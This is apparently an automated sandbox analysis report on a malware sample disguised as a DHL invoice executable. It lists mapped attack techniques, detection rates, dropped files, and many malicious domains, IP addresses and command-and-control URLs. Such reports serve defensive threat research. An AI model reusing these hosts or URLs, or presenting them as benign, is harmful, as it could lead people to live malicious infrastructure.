Source: Yara match	File source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	3 Obfuscated Files or Information	LSASS Memory	5 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	712 Process Injection	1 Software Packing	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	1 Timestomp	NTDS	12 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Masquerading	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	712 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL-INVOICE-MBV.exe	27%	Virustotal		Browse
DHL-INVOICE-MBV.exe	31%	ReversingLabs	Win32.Downloader.Minix

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll	4%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22\liboscar.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22\liboscar.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\AutoConnectHelper.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\AutoConnectHelper.exe	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\System.Runtime.Extensions.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
10.0.explorer.exe.13cc3814.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.0.firefox.exe.e283814.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
5.2.WWAHost.exe.324e1e0.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.0.firefox.exe.e283814.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.0.explorer.exe.13cc3814.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.0.explorer.exe.13cc3814.3.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.0.explorer.exe.13cc3814.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
5.2.WWAHost.exe.4313814.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.2.firefox.exe.e283814.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
www.driftreiki.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.driftreiki.com/d0ad/	0%	Avira URL Cloud	safe
http://www.budgaugh.com/d0ad/?jXu=ES079lGHSpjw2zZqpiB6hd2+bwfOy28JzKwBdlhywRNcHXuvrX4iPpPrJgUvxM/8mUCKQ1JU0ePMCpPawCFs3Mp7IC1gDg4d5g==&-ZeDxH=1bfDxheXLTWtxB0	100%	Avira URL Cloud	malware
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
http://www.yumfechy.online/d0ad/	100%	Avira URL Cloud	malware
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.clickthelink.xyz/d0ad/	0%	Avira URL Cloud	safe
http://www.cccre8ive.com/	0%	Avira URL Cloud	safe
http://www.cccre8ive.com/vSvUluerSYkJZ205.pfmdn	0%	Avira URL Cloud	safe
http://www.migrationtask.com/d0ad/	0%	Avira URL Cloud	safe
http://www.salemsilverpalace.com/d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=EKBIswxubh+3rSi760MLmAr4JXvPRLtL3ozMDitkvV65RFIqiY835aWCQtue5THCT9fxMq7VmpQKPerXNr4JKGfkodcEQfh6sQ==	0%	Avira URL Cloud	safe
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMI	0%	Avira URL Cloud	safe
http://www.7o0i.com/d0ad/?jXu=UGTU82wtujibqQR8E2n422F7Zfw2d+xFnOfFMWTM8LMnetJ3NkFDX8bqmUj8VDzwoxc6QpBbYfZ2mv7LzdW/Xm9DjEFcRTi1ig==&-ZeDxH=1bfDxheXLTWtxB0	0%	Avira URL Cloud	safe
http://www.guvnorsnyc.com/d0ad/?jXu=zrLMOBLzw3r4M3Z/yuOODvZ2qFQg4fDKObavmOYF/mbdwyJReU8Eih7YSll5LHsPS7aScgEYlXeSWE+YT/OxrgX5e4N2j5d5AQ==&-ZeDxH=1bfDxheXLTWtxB0	0%	Avira URL Cloud	safe
http://www.budgaugh.com/d0ad/	100%	Avira URL Cloud	malware
http://www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs	0%	Avira URL Cloud	safe
http://www.donglinwangluo.site/d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=HCnz+iAgXK+7K7+9dSYLCP83SywxThg19T0Ldayx2vBhnzv8BQwSj7Hjke2daycRt4H7k7Lpl/EZig9RgqQ7Vyy58aT11h8vxw==	0%	Avira URL Cloud	safe
http://www.altruista.one/d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=sqJyaOVlBjEZAVpKslMv4znBhJqv2M2fNLntWooOtuBpve/S7gqmy/xe6Ibp48h7Rh2wKtnd+VCpDIBxA7ILq3XVPp4nW+NhJA==	0%	Avira URL Cloud	safe
http://www.donglinwangluo.site/d0ad/	0%	Avira URL Cloud	safe
http://profiles.aim.com	0%	Avira URL Cloud	safe
http://www.clickthelink.xyz/	0%	Avira URL Cloud	safe
http://www.7o0i.com/d0ad/	0%	Avira URL Cloud	safe
http://www.motorizedchess.com/d0ad/	0%	Avira URL Cloud	safe
http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H	0%	Avira URL Cloud	safe
http://www.christophersubala.online/d0ad/	0%	Avira URL Cloud	safe
http://www.rahaingoadvice.com/d0ad/	0%	Avira URL Cloud	safe
http://www.guvnorsnyc.com/	0%	Avira URL Cloud	safe
http://www.rahaingoadvice.com/d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2du7qUOKEZ20+Boj0NvLgszRV7s0TsfUd4g==&-ZeDxH=1bfDxheXLTWtxB0	0%	Avira URL Cloud	safe
www.driftreiki.com/d0ad/	0%	Avira URL Cloud	safe
https://outlook.com:Tue:Tn	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
http://www.bondiev.com/d0ad/	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://www.creotopi.biz/d0ad/	0%	Avira URL Cloud	safe
http://www.migrationtask.com/d0ad/?jXu=pSoFcc1sljf5pE8BAUAKgRGInj4t6J/8ED+D7ZUBpkkz/bcIOpxSRb8xzFWwpHvVFx48hu31rpRymwEIqHbvimFaG2ZjSEosQg==&-ZeDxH=1bfDxheXLTWtxB0	0%	Avira URL Cloud	safe
http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc	0%	Avira URL Cloud	safe
http://www.christophersubala.online/d0ad/?hZ=5jUpdPs&jXu=HtWyrRohZK7c8fd1APLwWRwJtB7cGxmiY3g361wIUH2W8bW5L0CPXM6H8QPzIx/FgYOXceqeXuSZGo2tEZEI7T7kC34NLHSzSQ==	0%	Avira URL Cloud	safe
http://www.sbgfoundation.net/d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=qk6bCrLFrTYlUGO/t3PC0vhi1ruOe5X2O7zMPSUEOWKorI5W5CC9pmQXmGdpZs8IhG91pCpdUbpgHMoHKfMckx4RAwKNJXBJ8w==	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://rahaingoadvice.com/d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2	0%	Avira URL Cloud	safe
http://www.sbgfoundation.net/d0ad/	0%	Avira URL Cloud	safe
http://www.driftreiki.com/d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=CcRoIk99VuHdxqnbMe4fCWW8YB6+5lBHd7AattmFAjuGnedAqC5z1GiP1/3phXFikd8x5PSyWZu2r/HN2vGAs2KGSq5bV7fyPg==	0%	Avira URL Cloud	safe
http://www.mnrinstitutes.com/d0ad/	0%	Avira URL Cloud	safe
http://www.w3.o	0%	Avira URL Cloud	safe
http://www.yumfechy.online/d0ad/?jXu=nohqkTeNBtLDTjvj2EgrRXuLLYVzZlI3Z/lUYKUGfmhSQZo0Fk3aztyWPJehU7Kl8eQVGPUpo63pAyjMlhEJyeFl0k1W9K+Dpw==&-ZeDxH=1bfDxheXLTWtxB0	100%	Avira URL Cloud	malware
http://www.legaldanaa.com/d0ad/	0%	Avira URL Cloud	safe
http://www.cccre8ive.com/h	0%	Avira URL Cloud	safe
http://www.mnrinstitutes.com/d0ad/?jXu=jjJd5e0DmTQo1TJERy8cZ6iwHgiAMW7tSAG3VG96MIrCLP8ueKug57ZRCpkKrz2d2a+jpP8qm1duoLHSN5X+t1/Y7kvplYFeFQ==&-ZeDxH=1bfDxheXLTWtxB0	0%	Avira URL Cloud	safe
http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMIPDJT	0%	Avira URL Cloud	safe
http://www.cccre8ive.com/vSvUluerSYkJZ205.pfm	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.pnpg.hair	188.114.96.3	true	true		unknown
www.donglinwangluo.site	154.221.20.121	true	true		unknown
www.motorizedchess.com	216.40.34.41	true	true		unknown
www.driftreiki.com	207.60.131.46	true	true	1%, Virustotal, Browse	unknown
legaldanaa.com	198.252.105.91	true	true		unknown
www.guvnorsnyc.com	3.64.163.50	true	true		unknown
mnrinstitutes.com	2.57.90.16	true	true		unknown
www.rahaingoadvice.com	51.91.236.193	true	true		unknown
sbgfoundation.net	162.241.217.234	true	true		unknown
www.migrationtask.com	74.208.236.144	true	true		unknown
www.clickthelink.xyz	3.64.163.50	true	true		unknown
www.altruista.one	89.31.143.1	true	true		unknown
bondiev.com	103.20.200.97	true	true		unknown
christophersubala.online	76.223.105.230	true	true		unknown
www.7o0i.com	64.64.242.59	true	true		unknown
salemsilverpalace.com	2.57.90.16	true	true		unknown
creotopi.biz	162.214.80.106	true	true		unknown
www.budgaugh.com	104.140.149.212	true	true		unknown
cccre8ive.com	202.5.16.67	true	false		unknown
www.yumfechy.online	162.0.238.95	true	true		unknown
www.cccre8ive.com	unknown	unknown	true		unknown
www.mnrinstitutes.com	unknown	unknown	true		unknown
www.christophersubala.online	unknown	unknown	true		unknown
www.legaldanaa.com	unknown	unknown	true		unknown
www.salemsilverpalace.com	unknown	unknown	true		unknown
www.creotopi.biz	unknown	unknown	true		unknown
www.sbgfoundation.net	unknown	unknown	true		unknown
www.bondiev.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.migrationtask.com/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.driftreiki.com/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.yumfechy.online/d0ad/	true	Avira URL Cloud: malware	unknown
http://www.salemsilverpalace.com/d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=EKBIswxubh+3rSi760MLmAr4JXvPRLtL3ozMDitkvV65RFIqiY835aWCQtue5THCT9fxMq7VmpQKPerXNr4JKGfkodcEQfh6sQ==	true	Avira URL Cloud: safe	unknown
http://www.budgaugh.com/d0ad/?jXu=ES079lGHSpjw2zZqpiB6hd2+bwfOy28JzKwBdlhywRNcHXuvrX4iPpPrJgUvxM/8mUCKQ1JU0ePMCpPawCFs3Mp7IC1gDg4d5g==&-ZeDxH=1bfDxheXLTWtxB0	true	Avira URL Cloud: malware	unknown
http://www.clickthelink.xyz/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.7o0i.com/d0ad/?jXu=UGTU82wtujibqQR8E2n422F7Zfw2d+xFnOfFMWTM8LMnetJ3NkFDX8bqmUj8VDzwoxc6QpBbYfZ2mv7LzdW/Xm9DjEFcRTi1ig==&-ZeDxH=1bfDxheXLTWtxB0	true	Avira URL Cloud: safe	unknown
http://www.guvnorsnyc.com/d0ad/?jXu=zrLMOBLzw3r4M3Z/yuOODvZ2qFQg4fDKObavmOYF/mbdwyJReU8Eih7YSll5LHsPS7aScgEYlXeSWE+YT/OxrgX5e4N2j5d5AQ==&-ZeDxH=1bfDxheXLTWtxB0	true	Avira URL Cloud: safe	unknown
http://www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs	true	Avira URL Cloud: safe	unknown
http://www.donglinwangluo.site/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.budgaugh.com/d0ad/	true	Avira URL Cloud: malware	unknown
http://www.donglinwangluo.site/d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=HCnz+iAgXK+7K7+9dSYLCP83SywxThg19T0Ldayx2vBhnzv8BQwSj7Hjke2daycRt4H7k7Lpl/EZig9RgqQ7Vyy58aT11h8vxw==	true	Avira URL Cloud: safe	unknown
http://www.altruista.one/d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=sqJyaOVlBjEZAVpKslMv4znBhJqv2M2fNLntWooOtuBpve/S7gqmy/xe6Ibp48h7Rh2wKtnd+VCpDIBxA7ILq3XVPp4nW+NhJA==	true	Avira URL Cloud: safe	unknown
http://www.7o0i.com/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.motorizedchess.com/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.christophersubala.online/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.rahaingoadvice.com/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.rahaingoadvice.com/d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2du7qUOKEZ20+Boj0NvLgszRV7s0TsfUd4g==&-ZeDxH=1bfDxheXLTWtxB0	true	Avira URL Cloud: safe	unknown
www.driftreiki.com/d0ad/	true	Avira URL Cloud: safe	low
http://www.creotopi.biz/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.bondiev.com/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.migrationtask.com/d0ad/?jXu=pSoFcc1sljf5pE8BAUAKgRGInj4t6J/8ED+D7ZUBpkkz/bcIOpxSRb8xzFWwpHvVFx48hu31rpRymwEIqHbvimFaG2ZjSEosQg==&-ZeDxH=1bfDxheXLTWtxB0	true	Avira URL Cloud: safe	unknown
http://www.sbgfoundation.net/d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=qk6bCrLFrTYlUGO/t3PC0vhi1ruOe5X2O7zMPSUEOWKorI5W5CC9pmQXmGdpZs8IhG91pCpdUbpgHMoHKfMckx4RAwKNJXBJ8w==	true	Avira URL Cloud: safe	unknown
http://www.christophersubala.online/d0ad/?hZ=5jUpdPs&jXu=HtWyrRohZK7c8fd1APLwWRwJtB7cGxmiY3g361wIUH2W8bW5L0CPXM6H8QPzIx/FgYOXceqeXuSZGo2tEZEI7T7kC34NLHSzSQ==	true	Avira URL Cloud: safe	unknown
http://www.sbgfoundation.net/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.legaldanaa.com/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.yumfechy.online/d0ad/?jXu=nohqkTeNBtLDTjvj2EgrRXuLLYVzZlI3Z/lUYKUGfmhSQZo0Fk3aztyWPJehU7Kl8eQVGPUpo63pAyjMlhEJyeFl0k1W9K+Dpw==&-ZeDxH=1bfDxheXLTWtxB0	true	Avira URL Cloud: malware	unknown
http://www.mnrinstitutes.com/d0ad/	true	Avira URL Cloud: safe	unknown
http://www.driftreiki.com/d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=CcRoIk99VuHdxqnbMe4fCWW8YB6+5lBHd7AattmFAjuGnedAqC5z1GiP1/3phXFikd8x5PSyWZu2r/HN2vGAs2KGSq5bV7fyPg==	true	Avira URL Cloud: safe	unknown
http://www.mnrinstitutes.com/d0ad/?jXu=jjJd5e0DmTQo1TJERy8cZ6iwHgiAMW7tSAG3VG96MIrCLP8ueKug57ZRCpkKrz2d2a+jpP8qm1duoLHSN5X+t1/Y7kvplYFeFQ==&-ZeDxH=1bfDxheXLTWtxB0	true	Avira URL Cloud: safe	unknown
http://www.cccre8ive.com/vSvUluerSYkJZ205.pfm	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.cccre8ive.com/	DHL-INVOICE-MBV.exe, 00000003.00000002.18128327162.0000000001841000.00000004.00000020.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18127988183.0000000001814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	false		high
https://duckduckgo.com/ac/?q=	WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	false		high
https://api.msn.com:443/v1/news/Feed/Windows?i	explorer.exe, 0000000A.00000000.18255297358.000000000CDDF000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	false		high
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	DHL-INVOICE-MBV.exe, 00000003.00000001.17791517767.0000000000649000.00000008.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cccre8ive.com/vSvUluerSYkJZ205.pfmdn	DHL-INVOICE-MBV.exe, 00000003.00000002.18128161486.0000000001829000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://deff.nelreports.net/api/report?cat=msn	explorer.exe, 0000000A.00000000.18257225462.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18381242780.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18504924350.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18442076455.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 0000000A.00000000.18257225462.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18381242780.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18504924350.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18442076455.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	DHL-INVOICE-MBV.exe, 00000003.00000001.17791344013.0000000000626000.00000008.00000001.01000000.00000006.sdmp	false		high
http://www.gopher.ftp://ftp.	DHL-INVOICE-MBV.exe, 00000003.00000001.17791517767.0000000000649000.00000008.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMI	WWAHost.exe, 00000005.00000002.22578871826.00000000049FA000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant	explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	false		high
http://pidgin.im/websiteYou	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false		high
https://api.oscar.aol.com/aim/startOSCARSessionhttps://api.icq.net/aim/startOSCARSession	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false		high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	false		high
http://www.icq.com/peoplehttp://profiles.aim.comIdleOnline	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false		high
https://help.hover.com/home?source=parked	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg	explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	false		high
http://profiles.aim.com	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false	Avira URL Cloud: safe	unknown
https://www.hover.com/domain_pricing?source=parked	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
https://twitter.com/hover	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
https://word.office.com	explorer.exe, 0000000A.00000000.18257225462.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18381242780.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18504924350.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18442076455.000000000CEFB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin	explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.screenname.aol.com/auth/clientLogin	DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	false		high
https://www.hover.com/renew?source=parked	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/	explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22585133227.000000000878C000.00000004.00000800.00020000.00000000.sdmp, e216404J.5.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	DHL-INVOICE-MBV.exe	false		high
http://www.clickthelink.xyz/	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H	WWAHost.exe, 00000005.00000002.22580951493.0000000005CD2000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o	explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.hover.com/tos?source=parked	WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	false		high
